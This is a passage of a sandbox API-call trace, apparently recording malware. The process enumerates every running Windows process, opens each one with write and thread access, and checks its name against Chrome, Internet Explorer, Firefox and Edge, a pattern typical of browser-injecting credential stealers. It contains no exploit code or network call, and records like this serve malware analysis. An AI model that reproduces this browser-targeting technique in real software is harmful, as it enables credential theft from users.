	[0198.426] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0198.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x15f0
	[0198.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.427] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0198.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.427] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.428] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0198.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.428] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.428] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0198.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x15f4
	[0198.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.429] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0198.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.429] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.430] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0198.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.430] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.430] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0198.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x15f8
	[0198.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.431] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0198.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.431] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.432] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0198.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.432] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.432] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0198.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x15fc
	[0198.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.433] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0198.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.433] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.434] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0198.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.434] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0198.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1600
	[0198.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.435] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0198.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.435] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.436] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0198.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.436] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.436] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0198.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1604
	[0198.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.438] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.438] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.438] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.438] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1608
	[0198.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.439] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.440] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.440] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.440] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.440] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x160c
	[0198.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.441] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.442] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.442] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.442] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.442] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1610
	[0198.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.443] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.443] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.444] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.444] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.444] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1614
	[0198.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.445] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.445] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.446] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.446] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.446] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1618
	[0198.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.447] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.447] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.448] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.448] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.448] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x161c
	[0198.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.449] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.449] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.450] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.450] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.450] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1620
	[0198.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.451] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.451] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.452] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.452] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0198.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1624
	[0198.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.453] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0198.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.453] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.453] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0198.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.454] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.454] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1628
	[0198.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.455] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.455] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.455] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.456] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.456] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0198.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x162c
	[0198.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.457] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.457] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.457] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.458] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.458] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0198.458] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1630
	[0198.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.459] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0198.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.459] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.459] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0198.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.459] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.460] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0198.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1634
	[0198.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.460] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0198.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.461] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.461] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0198.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.461] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.462] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0198.462] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1638
	[0198.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.462] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0198.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.463] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.463] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0198.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.463] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.464] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0198.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x163c
	[0198.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.465] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0198.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.465] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.465] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0198.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.466] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.466] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0198.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1640
	[0198.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.467] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0198.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.467] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.467] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0198.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.467] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.468] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0198.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1644
	[0198.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.468] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0198.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.469] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.469] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0198.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.469] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.469] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0198.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0198.470] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0198.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1648
	[0198.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.471] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0198.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.472] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.472] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0198.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.473] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.473] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0198.474] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x164c
	[0198.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.474] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0198.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.474] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0198.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.474] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0198.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.475] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0198.475] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0198.476] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1650
	[0198.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0198.476] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0198.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
